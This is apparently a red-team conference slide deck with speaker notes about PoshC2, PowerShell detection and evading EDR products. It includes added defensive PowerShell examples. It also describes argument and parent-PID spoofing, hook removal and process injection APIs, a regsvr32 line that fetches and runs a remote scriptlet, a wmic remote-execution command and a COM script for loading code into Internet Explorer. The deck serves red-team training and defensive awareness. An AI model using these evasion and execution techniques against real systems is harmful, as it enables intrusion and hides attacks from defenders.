2. Contents
Introductions
+ Whoami / Whoarewe
What is PowerShell
+ Understand what PowerShell is / key components
+ Is it DEAD?
Evolution of PoshC2
+ Release timeline & changes
EDR
+ History & challenges (offensive)
+ Future predictions
June 2019
3. @benpturner
+ Managing Principal Security Consultant @ Nettitude
+ Lead the Global Red Team Operation @ Nettitude
+ 8 years as a Crest Team Leader (CHECK Team Leader - Infrastructure)
+ 4 years as a Crest Simulated Attack Specialist (CCSAS - STAR/CBEST)
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course (Steelcon 2017/2018)
+ Workshops - Red Teaming with PoshC2 (BSides London/Manchester 2017)
+ Trusted Third Parties are NOT Trust Worthy (GiSEC Dubai 2019) - https://bit.ly/2I9ehIg
+ 21st Century War Stories (Steelcon/BSides 2016) - https://www.youtube.com/watch?v=O8Ul6QSPuo4
+ PowerShell Fu with Metasploit (Steelcon/BSides 2015) - https://www.youtube.com/watch?v=ottfZFRSsj4
Development Projects
+ Lead developer of PoshC2 - Nettitude's Open Source Command & Control (C2) Framework
+ General day to day PowerShell / C# projects & security research
4. @b4ggio_su
+ Principal Security Consultant @ Nettitude
+ A Red Team Lead in the Global Red Team Operation @ Nettitude
+ 16 years in IT:
• 4 years as a sysadmin
• 4 years in a defensive role
• 8 years in an offensive role
Training / Talks
+ Advanced Threat Actor Simulation - Red Team Training Course
+ Red Team & Stuff (Bsides Mcr 2018 / OWASP Warwick 2019)
5. @rbmaslen
+ Principal Security Consultant @ Nettitude
+ Red Teamer/Tools developer
+ 20 years in IT:
• 14 years as a developer (mainly C++, C#, HTML/JS)
• 6 years in an offensive role
+ CCT / CCSAM / OSCP / OSCE
Training / Talks
+ Thick Client Destruction (Steelcon 2017)
+ COM and the PowerThIEf (Steelcon 2018)
Development Projects
+ Contributor to PoshC2 - Nettitude's Open Source Command & Control (C2) Framework
+ PowerThIEf, SharpSocks, C# portscanner & ArpScan
6. Team Spicy Weasel
1st Place - 2018
+ labs.nettitude.com/blog/derbycon-2018-ctf-write-up
1st Place - 2017
+ labs.nettitude.com/blog/derbycon-2017-ctf-write-up
3rd Place - 2016
+ labs.nettitude.com/blog/derbycon-2016-ctf-write-up
7. What is PowerShell & is it DEAD?
1. The Microsoft binary - "PowerShell.exe"
2. The DLL behind the binary - "System.Management.Automation.dll"
3. The folder - C:\Windows\System32\WindowsPowerShell\v1.0
4. The version? Is PSv2 dead, or only versions after 4, because of Transcript Logging, ScriptBlock Logging, Module Logging & AMSI Integration?
https://www.youtube.com/watch?v=IYD_aiQtVaE
9. Evolution of PoshC2 2016 -> 2019
+ 2016
• June - v1.0 First Release of PoshC2 (Server/Implant in PowerShell)
• Dec - v2.0 Released - C# GUI, Daisy Chaining & Portability
+ 2017
• Mar - v2.1 Removed C# GUI
• May - PoshC2 Slack channel announced
• July - PoshC2_Python Release
• Oct - Reflective DLL / Shellcode Released
• Nov - v3.0 Released with SharpSocks
+ 2018
• Feb - Readthedocs Documentation Released
• July - v4.0 Released with Python Implant
+ 2019
• Jan - v4.8 Sharp Implant
• Feb - Support for 2003/XP
• June - SharpSocks Integration
13. Carbon Black / Tanium / EDR
1. This is probably the best query in Carbon Black to detect malicious activity:
"process_name:powershell.exe"
2. Do a search across your estate and see how much this shows up...
14. Carbon Black / Tanium / EDR
1. This is probably the best query in Carbon Black to detect malicious activity:
"modload:system.management.automation.dll"
"modload:system.management.automation.ni.dll"
2. Filter out "powershell.exe", and others...
3. Do a search across your estate and see how much this shows up...
15. Defensive / Legacy Approach
(Reactive)
+ Block powershell.exe on all endpoints
+ Only allow signed PowerShell scripts to be executed
+ Upgrade "powershell.exe" to v5.0 for greater visibility
+ Enable constrained mode to restrict language elements
+ Monitor for "System.Management.Automation.Dll" in processes
+ Integrate AMSI with AV vendor for early signature detection
+ Enable & Monitor ScriptBlock Logging for suspicious cmdlets
+ Enable & Monitor Transcript Logging for suspicious signatures
+ Enable & Monitor Module Logging for signatured modules
Modern Approach
(Proactive)
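The three logging items in the Reactive list map onto a handful of policy registry values. As an added example (my code, not from the talk or Nettitude), this sets them and reads them back so a gap shows up as Ok = False; the transcript directory is an assumption and the script needs an elevated shell.

```powershell
# Added example: apply and verify the PowerShell logging policy values that
# sit behind "Enable & Monitor ScriptBlock / Transcript / Module Logging".
# This is the root Group Policy writes to; changing it needs an elevated shell.
$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Expected state. C:\Transcripts is an assumed path; point it at a location
# ordinary users cannot read or delete from.
$LoggingPolicy = @{
    'ScriptBlockLogging' = @{ EnableScriptBlockLogging = 1 }   # 4104 events
    'ModuleLogging'      = @{ EnableModuleLogging = 1 }        # 4103 events
    'Transcription'      = @{ EnableTranscripting = 1
                              EnableInvocationHeader = 1
                              OutputDirectory = 'C:\Transcripts' }
}

function Set-PowerShellLoggingPolicy {
    foreach ($subKey in $LoggingPolicy.Keys) {
        $path = Join-Path $PolicyRoot $subKey
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        foreach ($name in $LoggingPolicy[$subKey].Keys) {
            $value = $LoggingPolicy[$subKey][$name]
            $type  = if ($value -is [int]) { 'DWord' } else { 'String' }
            New-ItemProperty -Path $path -Name $name -Value $value -PropertyType $type -Force | Out-Null
        }
    }
    # Module logging only records modules listed under ModuleNames; '*' means all.
    $modules = Join-Path $PolicyRoot 'ModuleLogging\ModuleNames'
    if (-not (Test-Path $modules)) { New-Item -Path $modules -Force | Out-Null }
    New-ItemProperty -Path $modules -Name '*' -Value '*' -PropertyType String -Force | Out-Null
}

function Get-PowerShellLoggingPolicy {
    # One row per expected value; Ok = False marks a host where logging is off.
    foreach ($subKey in $LoggingPolicy.Keys) {
        $path = Join-Path $PolicyRoot $subKey
        foreach ($name in $LoggingPolicy[$subKey].Keys) {
            $expected = $LoggingPolicy[$subKey][$name]
            $actual   = (Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue).$name
            [pscustomobject]@{ Key = $subKey; Name = $name; Expected = $expected
                               Actual = $actual; Ok = ($actual -eq $expected) }
        }
    }
}

Set-PowerShellLoggingPolicy
Get-PowerShellLoggingPolicy | Format-Table -AutoSize
```

Confirm with a fresh powershell.exe session, then look in the Microsoft-Windows-PowerShell/Operational log for 4103/4104 events and in the transcript directory for a new file.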
19. Supposedly Used by APT 33
+ Suspected attribution: Iran
+ Target sectors: Aerospace, energy
+ Overview: APT33 has targeted organizations, spanning multiple industries, headquartered in the U.S., Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production
• https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
• https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
• https://www.fireeye.com/current-threats/apt-groups.html#apt33
34. Avoidance - Tanium Signal Definition
image.path contains "system.management.automation"
AND process.path contains NOT "mscorsvw.exe"
AND process.path contains NOT "monitoringhost.exe"
AND process.path contains NOT "powershell.exe"
AND process.path contains NOT "powershell_ise.exe"
AND process.path contains NOT "sdiagnhost.exe"
AND process.path contains NOT "servermanager.exe"
AND process.path contains NOT "sqlps.exe"
AND process.path contains NOT "wsmprovhost.exe"
AND process.path contains NOT "Microsoft Azure AD Sync\Bin\miiserver.exe"
(Does require process tracing to be enabled in Tanium - quite heavy)
Warning - Not doing a hash checksum on the processes or their location
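The signal above, as an added PowerShell example (my code, not Nettitude's or Tanium's) over constructed module-load records; the record field names and the expected directory per host are assumptions. It adds the check the warning says the signal lacks: an allow-listed name running from a directory it does not belong in is still flagged.

```powershell
# Added example: the Tanium signal as a hunt, with a location check added.
# Record fields (ProcessPath, ImagePath) and expected directories are assumed.

# Hosts that legitimately load the PowerShell engine, with the directory
# (wildcard) each is expected to run from. $null = location varies per install.
$ExpectedHosts = @{
    'powershell.exe'     = 'C:\Windows\System32\WindowsPowerShell\v1.0'
    'powershell_ise.exe' = 'C:\Windows\System32\WindowsPowerShell\v1.0'
    'wsmprovhost.exe'    = 'C:\Windows\System32'
    'sdiagnhost.exe'     = 'C:\Windows\System32'
    'servermanager.exe'  = 'C:\Windows\System32'
    'monitoringhost.exe' = $null
    'mscorsvw.exe'       = 'C:\Windows\Microsoft.NET\Framework*\v*'
    'sqlps.exe'          = $null
    'miiserver.exe'      = 'C:\Program Files\Microsoft Azure AD Sync\Bin'
}

function Test-AutomationHost {
    # Returns $null when there is nothing to see, otherwise a one-line reason.
    param([Parameter(Mandatory)][pscustomobject]$Record)

    if ($Record.ImagePath -notmatch 'system\.management\.automation(\.ni)?\.dll$') {
        return $null                      # some other module load, ignore
    }
    $name = [System.IO.Path]::GetFileName($Record.ProcessPath).ToLowerInvariant()
    $dir  = [System.IO.Path]::GetDirectoryName($Record.ProcessPath)

    if (-not $ExpectedHosts.ContainsKey($name)) {
        return "unexpected host '$name' loaded the PowerShell engine"
    }
    $expected = $ExpectedHosts[$name]
    if ($expected -and $dir -notlike $expected) {
        # Same name as an allow-listed host, wrong place: a copied or renamed
        # binary passes the name-only filter but not this check.
        return "allow-listed name '$name' running from '$dir'"
    }
    return $null
}

# Constructed sample records (not real telemetry; the engine path is made up).
$Engine = 'C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\System.Management.Automation.dll'
$Sample = @(
    [pscustomobject]@{ ProcessPath = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ImagePath = $Engine }
    [pscustomobject]@{ ProcessPath = 'C:\Users\jason\AppData\Local\Temp\powershell.exe';           ImagePath = $Engine }
    [pscustomobject]@{ ProcessPath = 'C:\Users\jason\AppData\Local\Temp\update.exe';               ImagePath = $Engine }
    [pscustomobject]@{ ProcessPath = 'C:\Windows\System32\notepad.exe';                            ImagePath = 'C:\Windows\System32\kernel32.dll' }
)
foreach ($rec in $Sample) {
    $why = Test-AutomationHost $rec
    if ($why) { "[ALERT] $($rec.ProcessPath): $why" }
}
```

Only the second and third sample records produce an alert; the first is the real PowerShell host in its own directory and the fourth never loads the engine.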
40. Process Argument Spoofing
1. Create a process suspended - fake arguments
2. Identify the PEB using NtQueryInformationProcess
3. Parse the PEB and the command line structure
4. Overwrite the command line arguments using WriteProcessMemory - real arguments
5. Resume the process
41. Process Argument Spoofing
+ https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing
+ https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/
+ https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
42. Process Argument Spoofing - WHY?
Execution
+ PowerShell one-liner
+ regsvr32.exe /s /i:http://URL/file.sct scrobj.dll
+ wmic os get /FORMAT:"evil.xsl"
Lateral Movement
+ SC COMPUTERNAME stop "SERVICENAME"
+ wmic.exe /node:<target> /user:<user> /password:"<password>" process call create "%Systemroot%\Temp\batchfile.bat"
44. Partying With EDR
Migration Basics - Win API Calls:
+ VirtualAllocEx
+ WriteProcessMemory
+ CreateRemoteThread
http://deniable.org/misc/inject-all-the-things
However there are many ways to do the same thing, quick examples:
+ RtlCreateUserThread
+ NtCreateThreadEx
+ SetWindowsHookEx
+ QueueUserAPC
46. "In computer programming, the term hooking covers a range of techniques used to alter or augment the behaviour of an operating system, of applications, or of other software components by intercepting function calls or messages or events passed between software components. Code that handles such intercepted function calls, events or messages is called a hook." - Wikipedia
What is Hooking?
53. + Re-patch memory to remove the JMP to the original code
+ Update the IAT table to point to the correct function
+ Create a stub - to carry out the same system calls
+ Free a number of API calls and use FreeLibrary to remove interfering DLLs
https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
Bringing Back The Good Times
57. COM Intro - just watch this
https://vimeo.com/214856542
58. + Spoke about this at Steelcon last year, has proved really handy
+ Has been used to get past some EDRs
+ Breaks the attribution between processes
Migrating with COM into IE
59. The key to this? Junction folders
+ Junction folders, a technique leaked in the Vault 7 dumps
+ Forms the basis of SandboxEscaper's recent IE 11 sandbox escape
+ After adding some registry keys, allows code to be executed when you navigate to a folder
62. + If we can get a reference to an IE window we can call
+ URL needs to be in the format shell:::{<GUID>}
+ https://docs.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/platform-apis/aa752094(v%3Dvs.85)
How can we use that
63. + Great COM class, allows you to enumerate all the current open IE & Explorer windows and automate them
+ Guess what, you can then get them to navigate to a new location
+ https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974(v=vs.85).aspx
ShellWindows
64. Loading the DLL in IE, PowerShell
# ShellWindows COM class
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shwin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
<#
CLSID must be in the format "shell:::{CLSID}"
Second param 2048 is the BrowserNavConstants value for navOpenInNewTab
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use
#>
68. + Only use native DLLs? Thankfully not
+ Using CCWs (COM Callable Wrappers) we can write a .NET DLL and configure the registry keys so that when navigated to we can launch a .NET DLL. Use this as a COM hijack if you want.
+ No time to go into CCW in depth but have a read of https://docs.microsoft.com/en-us/dotnet/framework/interop/com-callable-wrapper
+ .NET is started in IE and loads the DLL
+ We need a .NET assembly with a class that implements an interface and some registry keys
COM Callable Wrapper
73. Setting up the .NET registry keys
+ Just make sure that you create or import the keys from an x64 application or use the explicit 64-bit key from the link below
+ https://docs.microsoft.com/en-us/windows/desktop/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
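A defender's counterpart to the CCW registration described above, added here as my own example (not from the talk): it lists InprocServer32 registrations in the user-writable HKCU\Software\Classes\CLSID, where a managed server (mscoree.dll with Assembly/CodeBase values) or a DLL outside the Windows and Program Files trees is worth a second look. The rules, the trusted roots and the sample records are assumptions of mine.

```powershell
# Added example: hunt per-user COM registrations of the kind a .NET (CCW)
# or COM-hijack payload needs. Rules and sample records are my assumptions.

# Directories a legitimate in-process server normally lives under.
$TrustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

function Test-ComRegistration {
    # $Reg has Clsid, Server (InprocServer32 default value), Assembly, CodeBase.
    # Returns the reasons it looks suspicious (empty array if none).
    param([Parameter(Mandatory)][pscustomobject]$Reg)
    $reasons = @()
    if (-not $Reg.Server) { return $reasons }
    $server = [Environment]::ExpandEnvironmentVariables($Reg.Server).Trim('"')

    if ($server -match '(^|\\)mscoree\.dll$') {
        # A managed class registered via regasm: the CLR starts in whatever
        # process activates the CLSID and loads the assembly named here.
        $reasons += "managed (CCW) server in user hive, assembly '$($Reg.Assembly)'"
        if ($Reg.CodeBase) { $reasons += "assembly loaded from $($Reg.CodeBase)" }
    } else {
        $trusted = $false
        foreach ($root in $TrustedRoots) { if ($server -like "$root*") { $trusted = $true } }
        if (-not $trusted) { $reasons += "server outside trusted roots: $server" }
    }
    return $reasons
}

function Get-UserComRegistration {
    # Live collection from the current user's hive; empty on a clean host.
    Get-ChildItem 'HKCU:\Software\Classes\CLSID' -ErrorAction SilentlyContinue | ForEach-Object {
        $srv = Get-ItemProperty (Join-Path $_.PSPath 'InprocServer32') -ErrorAction SilentlyContinue
        if ($srv) {
            [pscustomobject]@{ Clsid = $_.PSChildName; Server = $srv.'(default)'
                               Assembly = $srv.Assembly; CodeBase = $srv.CodeBase }
        }
    }
}

# Constructed sample records (placeholder CLSIDs, not from a real host).
$Sample = @(
    [pscustomobject]@{ Clsid = '{CLSID-1}'; Server = '%SystemRoot%\System32\shell32.dll'; Assembly = $null; CodeBase = $null }
    [pscustomobject]@{ Clsid = '{CLSID-2}'; Server = 'C:\Windows\System32\mscoree.dll'; Assembly = 'Sample, Version=1.0.0.0'
                       CodeBase = 'file:///C:/Users/jason/AppData/Local/Temp/Sample.dll' }
    [pscustomobject]@{ Clsid = '{CLSID-3}'; Server = 'C:\Users\jason\AppData\Roaming\loader.dll'; Assembly = $null; CodeBase = $null }
)
foreach ($rec in @($Sample) + @(Get-UserComRegistration)) {
    $why = Test-ComRegistration $rec
    if ($why) { "[SUSPECT] $($rec.Clsid): $($why -join '; ')" }
}
```

On a Windows host only the second and third sample records are reported; anything appended from the live hive is real and deserves a look at the DLL's signature and the owning user.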
75. One last thing - remember this script
# ShellWindows COM class
$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")
$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)
$shwin = [System.Activator]::CreateInstance($typeShwin)
$shwin[0].Navigate2("shell:::{56B6E39E-AB81-4E34-BC8B-99D1D28FB7E4}", 2048)
<#
CLSID must be in the format "shell:::{CLSID}"
Second param 2048 is the BrowserNavConstants value for navOpenInNewTab
https://msdn.microsoft.com/en-us/library/dd565688(v=vs.85).aspx
Further ideas on what payloads you may be able to use
#>
79. EDR Summary
+ EDR is not a silver bullet
+ Does give incredible visibility to the Blue Team
+ Highly recommended as a complementary piece of the defensive strategy but should not be solely relied on
+ Does not replace good people with experience
+ Constant cat and mouse game
80. Future Predictions
1. Over-reliance on EDR, especially on user endpoints and not server land or non-Windows systems
2. Customers focussing all attention on tertiary endpoints and not on critical functions or sensitive customer data
3. Move to zero-trust networks and MFA everywhere
4. Machine learning - investment into process & procedures
5. C2 frameworks moving to C++ base code - could see MSF be revived for red teaming
6. All standard AV/EDR vendors adopting in-memory scanning / AMSI
7. Windows 7 is EOL January 2020 - not a prediction but a reality
8. Windows 10 removal of .NET v2 - not a prediction but a reality
9. People going back to single executables running either C++ or C# code to evade LOLBAS signatures (LOLBAS vs arbitrary exe)
81. Future Predictions
1. Over-reliance on EDR, especially on endpoints and not server land (or Unix really)
2. C2 frameworks moving to C++ base code - could see MSF be revived for RT
3. We already have this level of capability and it's interesting what gets detected and what does not
4. All standard AV/EDR vendors adopting in-memory scanning
5. Windows 7 is EOL January 2020 - not a prediction but a massive jump
6. Windows 10 removal of .NET v2
7. People going back to single executables running either C++ or C# code to evade LOLBins signatures and
82. THANK YOU
Ben Turner @benpturner
Doug McLeod @b4ggio_su
Rob Maslen @rbmaslen
https://www.steelcon.info/training/
https://www.slideshare.net/nettitude_labs/powershell-is-dead-epic-learning
Editor's Notes
So whoami! My name is Ben Turner, I head up the Global Red Team @ Nettitude.
As evident from the geeky title I'm a PowerShell & .NET enthusiast!
One of the main reasons I'm standing here (on top of being accepted to talk) is because over the last two years I've seen and met 3 or 4 people who have explicitly said to me they are in the industry and want to do red teaming because they saw my talks and were inspired! This really resonated with me and I thought, I want to encourage anyone to get up and talk. The industry as a whole has some people who try to crush people but
Some other places you may have seen us is at Derbycon, we're quite a keen attender of this conference.
If you like CTFs check out some of the blogs we wrote off the back of the cons.
It will be sad this year it's coming to an end - hopefully we can go out with a bang and maintain that 1st place position!
.NET reflection can unhook
So there has been a lot of talk about PowerShell being dead and I wanted to share my small view of the world, with a slight focus on the evolution of PoshC2.
For those not aware, PoshC2 is a command and control framework that was created purely in PowerShell, designed to run on any Windows endpoint.
RAT - NOT Malware...
First of all created for learning purposes and evolved into much more, it really started out as 60 lines of code - this was including the logo!
And now is in the 10s of thousands of lines of code.
Let's think from an OPSEC perspective and show the start of PoshC2
Started out as a Windows-only C2 server and C2 implant written only for PowerShell...
Can anyone tell me what's wrong with this picture!
PAUSE...
Probably more obvious, a malicious PowerShell process has started as the user Jason...
Let's dig a bit deeper and look at what the PowerShell command line arguments look like to start with...
This is the default PoshC2 PowerShell implant
Simple detections, anything running "powershell.exe" especially spawned from office, mshta, vbscript, jscript etc
How easy is it to spot this
Presence of the normal, abnormal presence of the????
Can you threat hunt across your estate?
NO!
It's just getting more difficult to deploy, and it is only as good as the monitoring in place.
There is lots of obfuscation that is still possible to evade static analysis and even dynamic analysis toolkits
All throughout of 2018 APT 33 were being tracked by FireEye
Amongst many other known threat actor groups, but the reason I pick on these guys is that they have been known to use PoshC2.
People have been calling PoshC2 malware, but I would call this a remote access toolkit (RAT) that can be used for multiple purposes
Attribution is most likely IRAN
And typically used across the aerospace and energy sectors...
What's really interesting here is that the IOCs (indicators of compromise) show that the threat actor is using the defaults, e.g. PowerShell one-liners, and is still having a huge amount of success
Explicitly a guy called Andrew from FireEye - @QW5kcmV3
The next big thing is the C# implant
This is where it gets tough to find an implant as the clr.dll or mscoree.dll is loaded into more things than you realise
DEMO!!!!! IF WE HAVE TIME
Endpoint Detection and response is software that sends behavioural data to a central database for analysis
This is us when we run a process list and see an EDR system!!
But all is not lost and we have some example stories about challenges faced with different EDR solution
Behaviour based not just signature
We thought the blue team were watching an account which we needed to use. So we distracted them
We know carbon black will flag on unsigned binaries connecting to the internet, so we pushed out unsigned binaries to a handful of machines and ran them
Enough to keep them busy
If the blue team have so much visibility, how can we throw them off the scent?
This is trickery and there are many things that can be done, but two that I'm going to lightly cover are Parent PID spoofing and Argument spoofing... deliberately to mess with process chaining.
STARTUPINFOEX
This structure contains an lpAttributeList
Update pid using UpdateProcThreadAttribute
Event Tracing for Windows - ETW
First screenshot shows the parent section process the same as the one below.
Second example shows that the parent process and the Process ID in the parent are different.
Process Argument Spoofing
First off, got to give credit to some of the initial people discussing this: Casey Smith and Will Burgess.
If you haven't seen Will's talk - Red Teaming in the EDR Age then you should definitely go give it a watch.
Also covers a tool they created, Gargoyle, to hide malware in memory.
And, finally, programs that determine process arguments by reading the process PEB will see the real arguments and not the fake arguments.
Migration basics - number of API calls - generally a basic example will take a handle on another process and call VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
These are not the only options available to us.
Inject all the things - is a nice wee project to assist in testing some of these calls - you should check it out
Instead of using CreateRemoteThread we can use for example RtlCreateUserThread - this bypassed the checks Symantec were looking for and we ended up with successful migration.
In short it is a technique that allows you to alter or augment the behaviour of the operating system.
Hook a function, do bad things... In old school gaming this is equivalent to hacking a game so that you cannot die.
Turns out the last option is super common
Kernel Patch Protection or PatchGuard scans the kernel on almost every level and will trigger a BSOD if a modification is detected. This includes the areas where the WinAPI's logic is carried out.
ZwCreateThreadEx
In Process Client
Hoang Bui
XPN
Many other examples - show these options to be rather easy.
My house my rules
What am I going to do about it?
F*cking Judo Chop it the hell outta there!
@fsx30
XPN
Many other examples - show these options to be rather easy.
Navigating to this folder means that code will be executed within explorer
We already have this level of capability and it's interesting what gets detected and what does not
Harder to pwn 2003/XP/NT
Palantir, AI, machine learning, Darktrace...
Microsoft ATA, ATP, Defender